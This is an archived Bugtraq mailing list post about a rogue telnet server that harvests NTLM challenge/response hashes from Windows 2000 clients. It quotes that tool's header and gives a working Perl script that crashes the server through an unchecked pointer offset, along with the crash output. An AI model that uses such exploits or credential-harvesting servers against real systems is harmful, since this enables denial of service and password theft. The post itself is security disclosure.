Home page logo

bugtraq logo Bugtraq mailing list archives

Re: Win2k Telnet.exe malicious server vulnerability
From: Jim Paris <jim () JTAN COM>
Date: Thu, 14 Sep 2000 12:04:09 -0400

/* NTLM telnetD v0.8

   Snarfs NTLM challenge/response by convincing w2k telnet client to
   Outputs auth-data in LophtCrack sniff format on stdout.

   compile: gcc -o w2kteld ntlm_telnetd.c
   run: ./w2kteld

   Then wait for w2k to telnet to you.
   for the impatient, there are always ways of making w2k telnet!


And if you happen to get bitten by this rogue server,
it must be time for a friendly little DoS against it.
(rp->upos is used as a pointer modifier without checking its bounds)

sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections

Connection from:
Got NTLM response token
[1]+  Segmentation fault      ./ntlm_telnetd -l 1234

We are so batman.  And now I'm late for class.  (grr, 6.003)


#!/usr/bin/perl -w
# anti-ntlm-telnetd by jim () jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->send("A"x7 .               # foo
         "\xFF" .              # length (passed to gettoken)
         "A"x7 .               # bar
         "NTLMSSP\0\x03" .     # protocol and type
         "A"x29 .              # baz
         "\xDE\xAD\xBE\xEF");  # rp->upos

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]